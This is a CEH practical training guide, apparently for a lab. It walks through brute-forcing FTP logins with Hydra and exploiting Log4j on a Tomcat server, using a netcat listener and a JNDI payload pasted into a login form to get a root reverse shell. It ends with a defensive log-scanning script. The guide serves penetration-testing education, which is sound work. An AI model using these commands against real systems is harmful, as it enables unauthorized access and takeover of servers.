CEH Practical Guide

2. Perform Webserver attacks

An ethical hacker or pen tester must test the company’s web server against various attacks and other vulnerabilities.


Last updated 2 months ago


1. Crack FTP credentials using Hydra

hydra -L users.txt -P passwords.txt ftp://192.168.18.2

2. Gain Access to Target Web Server by Exploiting Log4j Vulnerability

Install Docker

sudo apt-get update
sudo apt-get install docker.io 

Build the docker Image

docker build -t log4j-shell-poc .

-t: names (tags) the image being built; the trailing . is the build context directory.

Start the vulnerable server

docker run --network host log4j-shell-poc

Exploitation

Scan the IP

nmap -sV -sC 10.10.1.9
  1. From the result we can see that port 8080 is open and an Apache Tomcat/Coyote 1.1 server is running on the target system.

  2. Upon investigation we can see that Apache is vulnerable to a Remote Code Execution (RCE) attack. Now we will use searchsploit to find the vulnerabilities pertaining to RCE attacks on the target server.

  3. In the terminal window, run the searchsploit -t Apache RCE command to view the RCE vulnerabilities on the Apache server.

  4. Now we need to select a vulnerability from the list to exploit the server. From the Nmap scan we found that the Apache Tomcat server is running on JSP, so we will target Java vulnerabilities from the list.

  5. We can see that the Java platform is vulnerable to the Apache Log4j 2 - Remote Command Execution (RCE) exploit.

  6. We will now exploit the Log4j vulnerability present in the target web server to perform remote code execution.

  7. Click the Firefox icon at the top of the Desktop to open a browser window.

  8. In the address bar of the browser, type http://10.10.1.9:8080 and press Enter.

  9. We can observe that the Log4j-vulnerable server is running on the Ubuntu machine. Leave Firefox and the website open.

  10. Switch to the Terminal window, run cd log4j-shell-poc/ and press Enter to enter the log4j-shell-poc directory.

  11. Now we need to install JDK 8. To do that, open a new terminal window, type sudo su and press Enter to run the programs as the root user.

    In the [sudo] password for attacker field, type toor as a password and press Enter.

  12. We need to extract the JDK zip file, which is already placed at the /home/attacker location.

  13. Type tar -xf jdk-8u202-linux-x64.tar.gz and press Enter, to extract the file.

    -xf: extracts all files from the given archive file.

  14. Now we will move the jdk1.8.0_202 into /usr/bin/. To do that, type mv jdk1.8.0_202 /usr/bin/ and press Enter.

  15. Now, we need to update the installed JDK path in the poc.py file.

  16. Navigate to the previous terminal window. In the terminal, type pluma poc.py and press Enter to open the poc.py file.

  17. In the poc.py file scroll down and in line 62, replace jdk1.8.0_20/bin/javac with /usr/bin/jdk1.8.0_202/bin/javac.

  18. Scroll down to line 87 and replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.

  19. Scroll down to line 99 and replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.

  20. After making all the changes, save them and close the poc.py editor window.

  21. Now, open a new terminal window, type nc -lvp 9001 and press Enter to start a netcat listener, as shown in the screenshot.

  22. Switch to the previous terminal window, type python3 poc.py --userip 10.10.1.13 --webport 8000 --lport 9001 and press Enter to start the exploitation and create the payload.

  23. Now, copy the payload generated in the send me: section.

  24. Switch to the Firefox browser window. In the Username field, paste the payload that was copied in the previous step; in the Password field, type password and press the Login button, as shown in the screenshot.

    In the Password field you can enter any password.

  25. Now switch to the netcat listener; you can see that a reverse shell has opened.

  26. In the listener window type pwd and press Enter, to view the present working directory.

  27. Now, type whoami and press Enter.

  28. We can see that we have shell access to the target web application as a root user.

  29. The Log4j vulnerability takes the payload as input and processes it; as a result, we obtain a reverse shell.
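
For the defender's view of steps 24 to 29, the following added example (not part of the original guide or of the log4j-shell-poc project) scans request log lines for JNDI lookup strings in plain or URL-encoded form and extracts the callback endpoint for triage. The log format, the username field name and the addresses are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: login requests as an application log might record them.
# Addresses are documentation-range placeholders, not values from the lab.
SAMPLE_LOG = [
    "192.0.2.50 POST /login username=alice",
    "192.0.2.10 POST /login username=${jndi:ldap://192.0.2.10:1389/a}",
    "192.0.2.10 POST /login username=%24%7BJNDI%3Aldap%3A%2F%2F192.0.2.10%3A1389%2Fa%7D",
    "192.0.2.51 POST /login username=bob%40example.com",
]

# A JNDI lookup has the shape ${jndi:<scheme>://<host>[:<port>]/...}
JNDI_RE = re.compile(
    r"\$\{\s*jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def normalize(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input is inspected too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi_lookups(lines):
    """Return one record per log line that carries a JNDI lookup string."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = JNDI_RE.search(normalize(line))
        if match:
            hits.append({
                "line": lineno,
                "client": line.split()[0],          # first field: source address
                "scheme": match["scheme"].lower(),  # e.g. ldap
                "host": match["host"],              # callback server to block or hunt for
                "port": int(match["port"]) if match["port"] else None,
            })
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(hit)
```

The pattern covers the literal and URL-encoded forms only, so use it for log triage rather than as a filter in front of the application.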
